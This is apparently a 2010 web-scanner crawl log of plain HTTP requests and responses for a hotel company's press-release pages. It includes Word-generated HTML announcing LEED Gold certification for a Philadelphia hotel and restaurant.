{mso-level-tab-stop:1.5in; mso-level-number-position:left; text-indent:-.25in;}@list l9:level4 {mso-level-tab-stop:2.0in; mso-level-number-position:left; text-indent:-.25in;}@list l9:level5 {mso-level-tab-stop:2.5in; mso-level-number-position:left; text-indent:-.25in;}@list l9:level6 {mso-level-tab-stop:3.0in; mso-level-number-position:left; text-indent:-.25in;}@list l9:level7 {mso-level-tab-stop:3.5in; mso-level-number-position:left; text-indent:-.25in;}@list l9:level8 {mso-level-tab-stop:4.0in; mso-level-number-position:left; text-indent:-.25in;}@list l9:level9 {mso-level-tab-stop:4.5in; mso-level-number-position:left; text-indent:-.25in;}@list l10 {mso-list-id:1566069662; mso-list-type:hybrid; mso-list-template-ids:291660558 1253897630 197641 328713 66569 197641 328713 66569 197641 328713;}@list l10:level1 {mso-level-number-format:bullet; mso-level-text:\F0FC; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Wingdings;}@list l11 {mso-list-id:1636525908; mso-list-type:hybrid; mso-list-template-ids:2135300666 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l11:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:none; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}@list l12 {mso-list-id:1765494741; mso-list-type:hybrid; mso-list-template-ids:-1093994450 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l12:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}ol {margin-bottom:0in;}ul {margi..
- /pdfs/press/html/Palomar-Philadelphia-LEED-0910/

/pdfs/press/html/Palomar-Philadelphia-LEED-0910/

http://www.kimptonhotels.com/pdfs/press/html/Palomar-Philadelphia-LEED-0910/

Request

GET /pdfs/press/html/Palomar-Philadelphia-LEED-0910/ HTTP/1.1
Referer: http://www.kimptonhotels.com/pdfs/press/html/Palomar-Philadelphia-LEED-0910/index.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: www.kimptonhotels.com
Cookie: ASP.NET_SessionId=hyd2ui55rxmm2q55xslvrq55; ASPSESSIONIDAQQBQDDR=JDFEFPHBNDJFCIHIDDMHMENO
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 02:08:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 29286
Content-Type: text/html
Cache-control: private


<html xmlns:v="urn:schemas-microsoft-com:vml"xmlns:o="urn:schemas-microsoft-com:office:office"xmlns:w="urn:schemas-microsoft-com:office:word"xmlns:m="http://schemas.microsoft.com/office/2004/12/omml"xmlns:css="http://macVmlSchemaUri" xmlns="http://www.w3.org/TR/REC-html40"><head><meta name=Title content=" "><meta name=Keywords content=""><meta http-equiv=Content-Type content="text/html; charset=macintosh"><meta name=ProgId content=Word.Document><meta name=Generator content="Microsoft Word 2008"><meta name=Originator content="Microsoft Word 2008"><link rel=File-List href="images/filelist.xml"><link rel=Edit-Time-Datahref="images/editdata.mso"><!--[if !mso]><style>v\:* {behavior:url(#default#VML);}o\:* {behavior:url(#default#VML);}w\:* {behavior:url(#default#VML);}.shape {behavior:url(#default#VML);}</style><![endif]--><title> </title><!--[if gte mso 9]><xml> <o:DocumentProperties> <o:Author> Lucy MacNichol</o:Author> <o:Template>Normal.dotm</o:Template> <o:LastAuthor>Marie Chen</o:LastAuthor> <o:Revision>2</o:Revision> <o:TotalTime>3</o:TotalTime> <o:LastPrinted>2010-09-13T20:43:00Z</o:LastPrinted> <o:Created>2010-09-13T20:44:00Z</o:Created> <o:LastSaved>2010-09-13T20:44:00Z</o:LastSaved> <o:Pages>1</o:Pages> <o:Words>1175</o:Words> <o:Characters>6698</o:Characters> <o:Lines>55</o:Lines> <o:Paragraphs>13</o:Paragraphs> <o:CharactersWithSpaces>8225</o:CharactersWithSpaces> <o:Version>12.0</o:Version> </o:DocumentProperties> <o:OfficeDocumentSettings> <o:PixelsPerInch>96</o:PixelsPerInch> <o:TargetScreenSize>800x600</o:TargetScreenSize> </o:OfficeDocumentSettings></xml><![endif]--><!--[if gte mso 9]><xml> <w:WordDocument> <w:TrackMoves>false</w:TrackMoves> <w:TrackFormatting/> <w:PunctuationKerning/> <w:ValidateAgainstSchemas/> <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid> <w:IgnoreMixedContent>false</w:IgnoreMixedContent> <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText> <w:Compatibility> <w:BreakWrappedTables/> <w:UseNormalStyleForList/> <w:DontUseIndentAsNumberingTabStop/> <w:DontGrowAutofit/> <w:FELineBreak11/> <w:WW11IndentRules/> <w:DontAutofitConstrainedTables/> <w:AutofitLikeWW11/> <w:HangulWidthLikeWW11/> </w:Compatibility> </w:WordDocument></xml><![endif]--><!--[if gte mso 9]><xml> <w:LatentStyles DefLockedState="false" LatentStyleCount="276"> <w:LsdException Locked="true" Name="Normal"/> <w:LsdException Locked="true" Name="heading 1"/> <w:LsdException Locked="true" Name="heading 2"/> <w:LsdException Locked="true" Name="heading 3"/> <w:LsdException Locked="true" Name="heading 4"/> <w:LsdException Locked="true" Name="heading 5"/> <w:LsdException Locked="true" Name="heading 6"/> <w:LsdException Locked="true" Name="heading 7"/> <w:LsdException Locked="true" Name="heading 8"/> <w:LsdException Locked="true" Name="heading 9"/> <w:LsdException Locked="true" Name="toc 1"/> <w:LsdException Locked="true" Name="toc 2"/> <w:LsdException Locked="true" Name="toc 3"/> <w:LsdException Locked="true" Name="toc 4"/> <w:LsdException Locked="true" Name="toc 5"/> <w:LsdException Locked="true" Name="toc 6"/> <w:LsdException Locked="true" Name="toc 7"/> <w:LsdException Locked="true" Name="toc 8"/> <w:LsdException Locked="true" Name="toc 9"/> <w:LsdException Locked="true" Name="caption"/> <w:LsdException Locked="true" Name="Title"/> <w:LsdException Locked="true" Name="Subtitle"/> <w:LsdException Locked="true" Name="Strong"/> <w:LsdException Locked="true" Name="Emphasis"/> <w:LsdException Locked="true" Name="Table Grid"/> </w:LatentStyles></xml><![endif]--><style><!-- /* Font Definitions */@font-face {font-family:Arial; panose-1:2 11 6 4 2 2 2 2 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Verdana; panose-1:2 11 6 4 3 5 4 4 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Calibri; panose-1:2 15 5 2 2 2 4 3 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Tahoma; panose-1:2 11 6 4 3 5 4 4 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;} /* Style Definitions */p.MsoNormal, li.MsoNormal, div.MsoNormal {mso-style-parent:""; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:12.0pt; font-family:"Times New Roman"; mso-fareast-font-family:Calibri; mso-bidi-font-family:"Times New Roman";}h3 {mso-style-link:"Heading 3 Char"; mso-style-next:Normal; margin-top:12.0pt; margin-right:0in; margin-bottom:3.0pt; margin-left:0in; mso-pagination:widow-orphan; page-break-after:avoid; mso-outline-level:3; font-size:13.0pt; font-family:Arial; mso-bidi-font-family:Arial; mso-bidi-font-weight:bold;}p.MsoCommentText, li.MsoCommentText, div.MsoCommentText {mso-style-noshow:yes; mso-style-link:"Comment Text Char"; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.0pt; font-family:"Times New Roman"; mso-fareast-font-family:Calibri; mso-bidi-font-family:"Times New Roman";}span.MsoCommentReference {mso-style-noshow:yes; mso-ansi-font-size:8.0pt; mso-bidi-font-size:8.0pt; font-family:"Times New Roman"; mso-bidi-font-family:"Times New Roman";}a:link, span.MsoHyperlink {font-family:"Times New Roman"; mso-bidi-font-family:"Times New Roman"; color:blue; text-decoration:underline; text-underline:single;}a:visited, span.MsoHyperlinkFollowed {color:purple; text-decoration:underline; text-underline:single;}strong {font-family:"Times New Roman"; mso-bidi-font-family:"Times New Roman"; mso-bidi-font-weight:bold;}p.MsoCommentSubject, li.MsoCommentSubject, div.MsoCommentSubject {mso-style-noshow:yes; mso-style-parent:"Comment Text"; mso-style-link:"Comment Subject Char"; mso-style-next:"Comment Text"; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.0pt; font-family:"Times New Roman"; mso-fareast-font-family:Calibri; mso-bidi-font-family:"Times New Roman"; font-weight:bold;}p.MsoAcetate, li.MsoAcetate, div.MsoAcetate {mso-style-noshow:yes; mso-style-link:"Balloon Text Char"; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:8.0pt; font-family:Tahoma; mso-fareast-font-family:Calibri; mso-bidi-font-family:Tahoma;}p.MsoListParagraph, li.MsoListParagraph, div.MsoListParagraph {margin-top:0in; margin-right:0in; margin-bottom:0in; margin-left:.5in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:12.0pt; font-family:"Times New Roman"; mso-fareast-font-family:Calibri; mso-bidi-font-family:"Times New Roman";}span.Heading3Char {mso-style-name:"Heading 3 Char"; mso-style-locked:yes; mso-style-link:"Heading 3"; mso-ansi-font-size:13.0pt; mso-bidi-font-size:13.0pt; font-family:Arial; mso-ascii-font-family:Arial; mso-hansi-font-family:Arial; mso-bidi-font-family:Arial; font-weight:bold;}span.BalloonTextChar {mso-style-name:"Balloon Text Char"; mso-style-noshow:yes; mso-style-locked:yes; mso-style-link:"Balloon Text"; mso-ansi-font-size:8.0pt; mso-bidi-font-size:8.0pt; font-family:Tahoma; mso-ascii-font-family:Tahoma; mso-hansi-font-family:Tahoma; mso-bidi-font-family:Tahoma;}span.CommentTextChar {mso-style-name:"Comment Text Char"; mso-style-noshow:yes; mso-style-locked:yes; mso-style-link:"Comment Text"; mso-ansi-font-size:10.0pt; mso-bidi-font-size:10.0pt; font-family:"Times New Roman"; mso-ascii-font-family:"Times New Roman"; mso-hansi-font-family:"Times New Roman"; mso-bidi-font-family:"Times New Roman";}span.CommentSubjectChar {mso-style-name:"Comment Subject Char"; mso-style-noshow:yes; mso-style-locked:yes; mso-style-parent:"Comment Text Char"; mso-style-link:"Comment Subject"; mso-ansi-font-size:10.0pt; mso-bidi-font-size:10.0pt; font-family:"Times New Roman"; mso-ascii-font-family:"Times New Roman"; mso-hansi-font-family:"Times New Roman"; mso-bidi-font-family:"Times New Roman"; font-weight:bold;}ins {mso-style-type:export-only; text-decoration:none;}span.msoIns {mso-style-type:export-only; mso-style-name:""; font-style:italic; color:black;}@page Section1 {size:8.5in 11.0in; margin:1.0in 1.0in 1.0in 1.0in; mso-header-margin:.5in; mso-footer-margin:.5in; mso-paper-source:0;}div.Section1 {page:Section1;}--></style><!--[if gte mso 10]><style> /* Style Definitions */table.MsoNormalTable {mso-style-name:"Table Normal"; mso-tstyle-rowband-size:0; mso-tstyle-colband-size:0; mso-style-noshow:yes; mso-style-parent:""; mso-padding-alt:0in 5.4pt 0in 5.4pt; mso-para-margin:0in; mso-para-margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.0pt; font-family:"Times New Roman"; mso-ascii-font-family:Calibri; mso-hansi-font-family:Calibri;}</style><![endif]--><!--[if gte mso 9]><xml> <o:shapedefaults v:ext="edit" spidmax="2050"/></xml><![endif]--><!--[if gte mso 9]><xml> <o:shapelayout v:ext="edit"> <o:idmap v:ext="edit" data="1"/> </o:shapelayout></xml><![endif]--></head><body lang=EN-US link=blue vlink=purple style='tab-interval:.5in'><div class=Section1><p class=MsoNormal align=center style='text-align:center;line-height:150%'><spanstyle='font-family:Verdana;mso-no-proof:yes'><!--[if gte vml 1]><v:shapetype id="_x0000_t75" coordsize="21600,21600" o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe" filled="f" stroked="f"> <v:stroke joinstyle="miter"/> <v:formulas> <v:f eqn="if lineDrawn pixelLineWidth 0"/> <v:f eqn="sum @0 1 0"/> <v:f eqn="sum 0 0 @1"/> <v:f eqn="prod @2 1 2"/> <v:f eqn="prod @3 21600 pixelWidth"/> <v:f eqn="prod @3 21600 pixelHeight"/> <v:f eqn="sum @0 0 1"/> <v:f eqn="prod @6 1 2"/> <v:f eqn="prod @7 21600 pixelWidth"/> <v:f eqn="sum @8 21600 0"/> <v:f eqn="prod @7 21600 pixelHeight"/> <v:f eqn="sum @10 21600 0"/> </v:formulas> <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/> <o:lock v:ext="edit" aspectratio="t"/></v:shapetype><v:shape id="Picture_x0020_0" o:spid="_x0000_i1025" type="#_x0000_t75" alt="Palomar Philadelphia Hotel Glow 1c Invert.jpg" style='width:237pt; height:111pt;visibility:visible'> <v:imagedata src="images/image001.jpg" o:title=""/> <v:textbox style='mso-rotate-with-shape:t'/></v:shape><![endif]--><![if !vml]><img width=239 height=113src="images/image002.gif"alt="Palomar Philadelphia Hotel Glow 1c Invert.jpg" v:shapes="Picture_x0020_0"><![endif]></span><spanstyle='font-family:Arial;mso-bidi-font-family:Arial'><o:p></o:p></span></p><p class=MsoNormal><b style='mso-bidi-font-weight:normal'><spanstyle='font-size:11.0pt;font-family:Arial;mso-bidi-font-family:Arial'>FORIMMEDIATE RELEASE<o:p></o:p></span></b></p><p class=MsoNormal><span style='font-size:11.0pt;font-family:Arial;mso-bidi-font-family:Arial'><span style='mso-tab-count:1'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </span><o:p></o:p></span></p><p class=MsoNormal><span style='font-size:11.0pt;font-family:Arial;mso-bidi-font-family:Arial;color:black'>Media Contacts:<o:p></o:p></span></p><p class=MsoNormal><span style='font-size:11.0pt;font-family:Arial;mso-bidi-font-family:Arial;color:black'><o:p>&nbsp;</o:p></span></p><p class=MsoNormal><b style='mso-bidi-font-weight:normal'><spanstyle='font-size:11.0pt;font-family:Arial;mso-bidi-font-family:Arial;color:black'>Devine + Powers:<span style="mso-spacerun: yes">&nbsp; </span>LucyMacNichol<o:p></o:p></span></b></p><p class=MsoNormal><span style='font-size:11.0pt;font-family:Arial;mso-bidi-font-family:Arial;color:black'>215-568-2525 / </span><ahref="mailto:lmacnichol@devinepowers.com"><span style='font-size:11.0pt;font-family:Arial;mso-bidi-font-family:Arial'>lmacnichol@devinepowers.com</span></a><spanstyle='font-size:11.0pt;font-family:Arial;mso-bidi-font-family:Arial;color:black'> <o:p></o:p></span></p><h3 style='margin:0in;margin-bottom:.0001pt'><span style='font-size:11.0pt;color:black'>Kimpton Hotels &amp; Restaurants:<span style="mso-spacerun:yes">&nbsp; </span>Stacey Ellis<o:p></o:p></span></h3><p class=MsoNormal><span style='font-size:11.0pt;font-family:Arial;mso-bidi-font-family:Arial'>415-955-5492 / </span><a href="mailto:stacey.ellis@kimptongroup.com"><spanstyle='font-size:11.0pt;font-family:Arial;mso-bidi-font-family:Arial'>stacey.ellis@kimptongroup.com</span></a><spanstyle='font-size:11.0pt;font-family:Arial;mso-bidi-font-family:Arial'> <o:p></o:p></span></p><p class=MsoNormal><i style='mso-bidi-font-style:normal'><spanstyle='font-size:11.0pt;font-family:Arial;mso-bidi-font-family:Arial'><o:p>&nbsp;</o:p></span></i></p><p class=MsoNormal align=center style='text-align:center'><b style='mso-bidi-font-weight:normal'><span style='font-family:Arial;mso-bidi-font-family:Arial'><o:p>&nbsp;</o:p></span></b></p><p class=MsoNormal align=center style='text-align:center'><b style='mso-bidi-font-weight:normal'><span style='font-family:Arial;mso-bidi-font-family:Arial'><o:p>&nbsp;</o:p></span></b></p><p class=MsoNormal align=center style='text-align:center'><b style='mso-bidi-font-weight:normal'><span style='font-family:Arial;mso-bidi-font-family:Arial'>KIMPTON ANDCITY OF PHILADELPHIA ANNOUNCE FIRST HOTEL AND RESTAURANT TO EARN LEED� CERTIFICATIONFROM THE <o:p></o:p></span></b></p><p class=MsoNormal align=center style='text-align:center'><b style='mso-bidi-font-weight:normal'><span style='font-family:Arial;mso-bidi-font-family:Arial'>U.S. GREENBUILDING COUNCIL <o:p></o:p></span></b></p><p class=MsoNormal align=center style='text-align:center'><b style='mso-bidi-font-weight:normal'><span style='font-family:Arial;mso-bidi-font-family:Arial'><o:p>&nbsp;</o:p></span></b></p><p class=MsoNormal align=center style='text-align:center'><b style='mso-bidi-font-weight:normal'><i style='mso-bidi-font-style:normal'><span style='font-family:Arial;mso-bidi-font-family:Arial'>Kimpton Hotel Palomar Philadelphia and <o:p></o:p></span></i></b></p><p class=MsoNormal align=center style='text-align:center;mso-list:none'><bstyle='mso-bidi-font-weight:normal'><i style='mso-bidi-font-style:normal'><spanstyle='font-family:Arial;mso-bidi-font-family:Arial'>Square 1682 RestaurantCelebrate Gold <o:p></o:p></span></i></b></p><p class=MsoNormal style='line-height:150%'><span style='font-size:11.0pt;line-height:150%;font-family:Arial;mso-bidi-font-family:Arial'><o:p>&nbsp;</o:p></span></p><p class=MsoNormal style='line-height:150%'><b style='mso-bidi-font-weight:normal'><span style='font-size:11.0pt;line-height:150%;font-family:Arial;mso-bidi-font-family:Arial'>PHILADELPHIA, September 9, 2010 &#8211;</span></b><bstyle='mso-bidi-font-weight:normal'><span style='font-family:Arial;mso-bidi-font-family:Arial'> </span></b><span style='font-size:11.0pt;line-height:150%;font-family:Arial;mso-bidi-font-family:Arial'>Kimpton Hotels &amp; Restaurants, and theCity of Philadelphia, announce that one year after opening, Kimpton Hotel PalomarPhiladelphia and Square 1682 restaurant have been awarded LEED (Leadership inEnergy and Environmental Design) certification at the Gold level by the U.S.Green Building Council and verified by the Green Building CertificationInstitute (GBCI).<span style="mso-spacerun: yes">&nbsp; </span>LEED is thepreeminent program for the design, construction and operation ofhigh-performance green buildings.<span style="mso-spacerun: yes">&nbsp;</span>The milestone marks the first LEED-certified hotel and restaurant forKimpton and for Philadelphia. <b style='mso-bidi-font-weight:normal'><o:p></o:p></b></span></p><p class=MsoNormal style='line-height:150%'><span style='font-size:11.0pt;line-height:150%;font-family:Arial;mso-bidi-font-family:Arial'><o:p>&nbsp;</o:p></span></p><p class=MsoNormal style='line-height:150%'><span style='font-size:11.0pt;line-height:150%;font-family:Arial;mso-bidi-font-family:Arial'>�Thisachievement truly marks a milestone in Kimpton�s history and 29-year initiativeof sustainability,� said Mike Depatie, CEO at Kimpton Hotels &amp;Restaurants.<span style="mso-spacerun: yes">&nbsp; </span>�Since our founding,we have strived to lead the charge of environmental ch..
- /pdfs/press/html/Summer-Playground-0610/

/pdfs/press/html/Summer-Playground-0610/

http://www.kimptonhotels.com/pdfs/press/html/Summer-Playground-0610/

Request

GET /pdfs/press/html/Summer-Playground-0610/ HTTP/1.1
Referer: http://www.kimptonhotels.com/pdfs/press/html/Summer-Playground-0610/index.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: www.kimptonhotels.com
Cookie: ASP.NET_SessionId=hyd2ui55rxmm2q55xslvrq55; ASPSESSIONIDAQQBQDDR=JDFEFPHBNDJFCIHIDDMHMENO
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 02:08:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 41913
Content-Type: text/html
Cache-control: private


<html xmlns:v="urn:schemas-microsoft-com:vml"xmlns:o="urn:schemas-microsoft-com:office:office"xmlns:w="urn:schemas-microsoft-com:office:word"xmlns:dt="uuid:C2F41010-65B3-11d1-A29F-00AA00C14882"xmlns:m="http://schemas.microsoft.com/office/2004/12/omml"xmlns:css="http://macVmlSchemaUri" xmlns="http://www.w3.org/TR/REC-html40"><head><meta name=Title content=" "><meta name=Keywords content=""><meta http-equiv=Content-Type content="text/html; charset=macintosh"><meta name=ProgId content=Word.Document><meta name=Generator content="Microsoft Word 2008"><meta name=Originator content="Microsoft Word 2008"><link rel=File-List href="images/filelist.xml"><link rel=Edit-Time-Data href="images/editdata.mso"><!--[if !mso]><style>v\:* {behavior:url(#default#VML);}o\:* {behavior:url(#default#VML);}w\:* {behavior:url(#default#VML);}.shape {behavior:url(#default#VML);}</style><![endif]--><title> </title><!--[if gte mso 9]><xml> <o:DocumentProperties> <o:Author> </o:Author> <o:Template>Normal.dotm</o:Template> <o:LastAuthor>Marie Chen</o:LastAuthor> <o:Revision>2</o:Revision> <o:TotalTime>4</o:TotalTime> <o:LastPrinted>2010-06-16T00:00:00Z</o:LastPrinted> <o:Created>2010-06-16T00:01:00Z</o:Created> <o:LastSaved>2010-06-16T00:01:00Z</o:LastSaved> <o:Pages>1</o:Pages> <o:Words>922</o:Words> <o:Characters>5259</o:Characters> <o:Lines>43</o:Lines> <o:Paragraphs>10</o:Paragraphs> <o:CharactersWithSpaces>6458</o:CharactersWithSpaces> <o:Version>12.0</o:Version> </o:DocumentProperties> <o:CustomDocumentProperties> <o:_NewReviewCycle dt:dt="string"></o:_NewReviewCycle> </o:CustomDocumentProperties> <o:OfficeDocumentSettings> <o:PixelsPerInch>96</o:PixelsPerInch> <o:TargetScreenSize>800x600</o:TargetScreenSize> </o:OfficeDocumentSettings></xml><![endif]--><!--[if gte mso 9]><xml> <w:WordDocument> <w:TrackMoves>false</w:TrackMoves> <w:TrackFormatting/> <w:PunctuationKerning/> <w:ValidateAgainstSchemas/> <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid> <w:IgnoreMixedContent>false</w:IgnoreMixedContent> <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText> <w:Compatibility> <w:UseNormalStyleForList/> <w:DontUseIndentAsNumberingTabStop/> <w:FELineBreak11/> <w:WW11IndentRules/> <w:DontAutofitConstrainedTables/> <w:AutofitLikeWW11/> <w:HangulWidthLikeWW11/> </w:Compatibility> </w:WordDocument></xml><![endif]--><!--[if gte mso 9]><xml> <w:LatentStyles DefLockedState="false" LatentStyleCount="276"> </w:LatentStyles></xml><![endif]--><style><!-- /* Font Definitions */@font-face {font-family:Arial; panose-1:2 11 6 4 2 2 2 2 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:"Courier New"; panose-1:2 7 3 9 2 2 5 2 4 4; mso-font-charset:77; mso-generic-font-family:modern; mso-font-format:other; mso-font-pitch:fixed; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Times; panose-1:2 0 5 0 0 0 0 0 0 0; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Wingdings; panose-1:5 2 1 2 1 8 4 8 7 8; mso-font-charset:2; mso-generic-font-family:auto; mso-font-format:other; mso-font-pitch:variable; mso-font-signature:0 0 65536 0 128 0;}@font-face {font-family:Verdana; panose-1:2 11 6 4 3 5 4 4 2 4; mso-font-charset:77; mso-generic-font-family:roman; mso-font-format:other; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Calibri; panose-1:2 15 5 2 2 2 4 3 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Tahoma; panose-1:2 11 6 4 3 5 4 4 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:"Arial Unicode MS"; mso-font-charset:128; mso-generic-font-family:swiss; mso-font-pitch:variable; mso-font-signature:-1 -23 1056964608 0 -16695552 0;}@font-face {font-family:Consolas; panose-1:2 11 6 9 2 2 4 3 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;} /* Style Definitions */p.MsoNormal, li.MsoNormal, div.MsoNormal {mso-style-parent:""; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:12.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}h1 {mso-margin-top-alt:auto; margin-right:0in; mso-margin-bottom-alt:auto; margin-left:0in; mso-pagination:widow-orphan; mso-outline-level:1; font-size:24.0pt; font-family:"Arial Unicode MS"; mso-bidi-font-weight:bold;}h2 {mso-style-next:Normal; margin-top:12.0pt; margin-right:0in; margin-bottom:3.0pt; margin-left:0in; mso-pagination:widow-orphan; page-break-after:avoid; mso-outline-level:2; font-size:14.0pt; font-family:Arial; mso-bidi-font-family:Arial; mso-bidi-font-weight:bold; font-style:italic;}p.MsoCommentText, li.MsoCommentText, div.MsoCommentText {mso-style-noshow:yes; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}p.MsoHeader, li.MsoHeader, div.MsoHeader {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; tab-stops:center 3.25in right 6.5in; font-size:12.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}p.MsoFooter, li.MsoFooter, div.MsoFooter {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; tab-stops:center 3.25in right 6.5in; font-size:12.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}span.MsoCommentReference {mso-style-noshow:yes; mso-ansi-font-size:8.0pt; mso-bidi-font-size:8.0pt;}p.MsoBodyText, li.MsoBodyText, div.MsoBodyText {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:11.0pt; font-family:Arial; mso-fareast-font-family:Calibri; mso-bidi-font-family:Arial; color:black;}p.MsoBodyText2, li.MsoBodyText2, div.MsoBodyText2 {margin-top:0in; margin-right:0in; margin-bottom:6.0pt; margin-left:0in; line-height:200%; mso-pagination:widow-orphan; font-size:12.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}p.MsoBodyText3, li.MsoBodyText3, div.MsoBodyText3 {margin-top:0in; margin-right:0in; margin-bottom:6.0pt; margin-left:0in; mso-pagination:widow-orphan; font-size:8.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}a:link, span.MsoHyperlink {color:blue; text-decoration:underline; text-underline:single;}a:visited, span.MsoHyperlinkFollowed {color:purple; text-decoration:underline; text-underline:single;}strong {mso-bidi-font-weight:bold;}em {mso-bidi-font-style:italic;}p.MsoPlainText, li.MsoPlainText, div.MsoPlainText {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.5pt; font-family:"Times New Roman"; mso-ascii-font-family:Consolas; mso-fareast-font-family:Calibri; mso-hansi-font-family:Consolas; mso-bidi-font-family:"Times New Roman";}p.MsoCommentSubject, li.MsoCommentSubject, div.MsoCommentSubject {mso-style-noshow:yes; mso-style-parent:"Comment Text"; mso-style-next:"Comment Text"; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times; font-weight:bold;}p.MsoAcetate, li.MsoAcetate, div.MsoAcetate {mso-style-noshow:yes; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:8.0pt; font-family:Tahoma; mso-fareast-font-family:Calibri; mso-bidi-font-family:Tahoma;}span.CharChar6 {mso-style-name:" Char Char6"; mso-ansi-font-size:24.0pt; mso-bidi-font-size:24.0pt; font-family:"Arial Unicode MS"; mso-ascii-font-family:"Arial Unicode MS"; mso-fareast-font-family:"Arial Unicode MS"; mso-hansi-font-family:"Arial Unicode MS"; mso-bidi-font-family:"Arial Unicode MS"; mso-font-kerning:18.0pt; font-weight:bold;}span.CharChar5 {mso-style-name:" Char Char5"; mso-style-noshow:yes; font-family:Arial; mso-ascii-font-family:Arial; mso-hansi-font-family:Arial; mso-bidi-font-family:Arial; color:black;}span.CharChar4 {mso-style-name:" Char Char4"; mso-style-noshow:yes; mso-ansi-font-size:8.0pt; mso-bidi-font-size:8.0pt; font-family:Tahoma; mso-ascii-font-family:Tahoma; mso-hansi-font-family:Tahoma; mso-bidi-font-family:Tahoma;}span.CharChar3 {mso-style-name:" Char Char3"; mso-style-noshow:yes; mso-ansi-font-size:10.5pt; mso-bidi-font-size:10.5pt; font-family:Consolas; mso-ascii-font-family:Consolas; mso-hansi-font-family:Consolas;}span.CharChar2 {mso-style-name:" Char Char2"; mso-ansi-font-size:12.0pt; mso-bidi-font-size:12.0pt; font-family:Times; mso-ascii-font-family:Times; mso-hansi-font-family:Times; mso-bidi-font-family:Times;}span.kim111 {mso-style-name:kim111;}span.CharChar1 {mso-style-name:" Char Char1"; mso-style-noshow:yes; mso-ansi-font-size:12.0pt; mso-bidi-font-size:12.0pt; font-family:Times; mso-ascii-font-family:Times; mso-hansi-font-family:Times; mso-bidi-font-family:Times;}span.CharChar {mso-style-name:" Char Char"; mso-ansi-font-size:12.0pt; mso-bidi-font-size:12.0pt; font-family:Times; mso-ascii-font-family:Times; mso-hansi-font-family:Times; mso-bidi-font-family:Times;}span.dfs111 {mso-style-name:dfs111; font-family:Verdana; mso-ascii-font-family:Verdana; mso-hansi-font-family:Verdana;}span.emailstyle17 {mso-style-name:emailstyle17; mso-style-noshow:yes; mso-ansi-font-size:10.0pt; 